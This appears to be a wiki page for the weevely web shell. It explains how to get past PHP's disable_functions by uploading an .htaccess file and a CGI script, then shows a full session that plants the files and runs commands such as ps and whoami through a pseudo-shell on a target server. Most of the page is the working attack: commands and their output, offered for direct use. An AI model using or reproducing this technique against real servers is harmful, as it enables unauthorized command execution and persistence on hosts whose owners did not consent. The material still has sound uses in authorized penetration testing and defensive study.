Skip to content

Bypass disabled system shell functions via mod_cgi and .htaccess

Jump to bottom
epinna edited this page Sep 20, 2014 · 1 revision

The following technique has been presented in ASDIZZLE's blog article Getting shell access with PHP system functions disabled.

This tutorial shows how to gain shell command execution on hosting servers which does not allow any system-like function.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: audit_disablefunctionsbypass

Session

The module will automatically perform the checks, upload the .htaccess and CGI script and run a pseudo system shell on the remote server.

$ ./weevely.py http://localhost/asd.php asdasd

[+] weevely 3.2.0

[+] Target:	www-data@target:/var/www/html
[+] Session:	_/weevely/sessions/localhost/asd_0.session
[+] Shell:	PHP interpreter

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
www-data@target:/var/www/html PHP> :audit_disablefunctionbypass
[-][disablefunctionbypass] After usage, use ':file_rm' to remove '/var/www/html/.htaccess' and '/var/www/html/acubu.ved'
[-][disablefunctionbypass] Run console without reinstalling with ':audit_disablefunctionbypass -just-run http://localhost/acubu.ved'
[-][disablefunctionbypass] Type 'quit' to return to weevely shell. Requests are not obfuscated
CGI shell replacement $ ps -aux
  PID TTY          TIME CMD
24693 ?        00:00:00 apache2
24694 ?        00:00:00 apache2
24695 ?        00:00:00 apache2
24696 ?        00:00:00 apache2
24697 ?        00:00:00 apache2
24859 ?        00:00:00 acubu.ved
24864 ?        00:00:00 ps

CGI shell replacement $ quit
www-data@emilio-lin:/var/www/html PHP>

To avoid running every time the installing process, you can run directly the shell replacement console pointing to the right URL with the -just-run option.

www-data@emilio-lin:/var/www/html PHP> :audit_disablefunctionbypass -just-run http://localhost/acubu.ved
[-][disablefunctionbypass] Type 'quit' to return to weevely shell. Requests are not obfuscated
CGI shell replacement $ whoami
www-data

CGI shell replacement $
Clone this wiki locally